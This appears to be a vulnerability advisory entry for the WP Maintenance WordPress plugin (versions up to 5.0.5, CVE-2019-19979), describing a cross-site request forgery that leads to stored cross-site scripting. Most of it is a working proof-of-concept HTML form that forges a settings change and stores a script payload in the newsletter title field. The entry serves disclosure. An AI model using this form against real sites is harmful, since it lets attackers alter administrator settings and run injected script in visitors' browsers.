Lucene search
Chloe ChamberlandWPEX-ID:D4ABE672-91FB-4F1C-8970-3D600AA8513FHistoryNov 19, 2019 - 12:00 a.m.
WP Maintenance <= 5.0.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting
2019-11-1900:00:00
Chloe Chamberland
37
EPSS
0.004
Percentile
72.8%
No nonce protection on form submissions leading to CSRF and no input/output sanitization allowing for XSS when CSRF is exploited.
<html>
<body>
<form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST">
<input type="hidden" name="action" value="update_general" />
<input type="hidden" name="wp_maintenance_active" value="1" />
<input type="hidden" name="wp_maintenance_settings[titre_maintenance]" value="Whatever" />
<input type="hidden" name="wp_maintenance_settings[text_maintenance]" value="Come back quickly!" />
<input type="hidden" name="wp_maintenance_settings[text_bt_maintenance]" value="" />
<input type="hidden" name="wp_maintenance_settings[add_wplogin]" value="0" />
<input type="hidden" name="wp_maintenance_settings[add_wplogin_title]" value="" />
<input type="hidden" name="wp_maintenance_settings[enable_seo]" value="0" />
<input type="hidden" name="wp_maintenance_settings[seo_title]" value="" />
<input type="hidden" name="wp_maintenance_settings[seo_description]" value="" />
<input type="hidden" name="wp_maintenance_settings[favicon]" value="" />
<input type="hidden" name="wp_maintenance_settings[code_analytics]" value="" />
<input type="hidden" name="wp_maintenance_settings[domain_analytics]" value="URL" />
<input type="hidden" name="wp_maintenance_social_options[enable]" value="0" />
<input type="hidden" name="wp_maintenance_social_options[texte]" value="" />
<input type="hidden" name="wp_maintenance_social[facebook]" value="" />
<input type="hidden" name="wp_maintenance_social[twitter]" value="" />
<input type="hidden" name="wp_maintenance_social[linkedin]" value="" />
<input type="hidden" name="wp_maintenance_social[flickr]" value="" />
<input type="hidden" name="wp_maintenance_social[youtube]" value="" />
<input type="hidden" name="wp_maintenance_social[pinterest]" value="" />
<input type="hidden" name="wp_maintenance_social[vimeo]" value="" />
<input type="hidden" name="wp_maintenance_social[instagram]" value="" />
<input type="hidden" name="wp_maintenance_social[google_plus]" value="" />
<input type="hidden" name="wp_maintenance_social[about_me]" value="" />
<input type="hidden" name="wp_maintenance_social[soundcloud]" value="" />
<input type="hidden" name="wp_maintenance_social[skype]" value="" />
<input type="hidden" name="wp_maintenance_social[tumblr]" value="" />
<input type="hidden" name="wp_maintenance_social[blogger]" value="" />
<input type="hidden" name="wp_maintenance_social[paypal]" value="" />
<input type="hidden" name="wp_maintenance_social_options[size]" value="32" />
<input type="hidden" name="wp_maintenance_social_options[style]" value="style1" />
<input type="hidden" name="wp_maintenance_social_options[position]" value="bottom" />
<input type="hidden" name="wp_maintenance_social_options[align]" value="center" />
<input type="hidden" name="wp_maintenance_social_options[theme]" value="" />
<input type="hidden" name="wp_maintenance_social_options[reset]" value="0" />
<input type="hidden" name="wp_maintenance_settings[newletter]" value="1" />
<input type="hidden" name="wp_maintenance_settings[title_newletter]" value="<script>alert(1)</script>" />
<input type="hidden" name="wp_maintenance_settings[type_newletter]" value="shortcode" />
<input type="hidden" name="wp_maintenance_settings[code_newletter]" value="" />
<input type="hidden" name="wp_maintenance_settings[iframe_newletter]" value="" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
prion
prion
Cross site request forgery (csrf)
2019-12-26 03:15:00
cve
cve
CVE-2019-19979
2019-12-26 03:15:11
symantec
symantec
nvd
nvd
CVE-2019-19979
2019-12-26 03:15:11
wpvulndb
wpvulndb
cvelist
cvelist
CVE-2019-19979
2019-12-26 02:26:32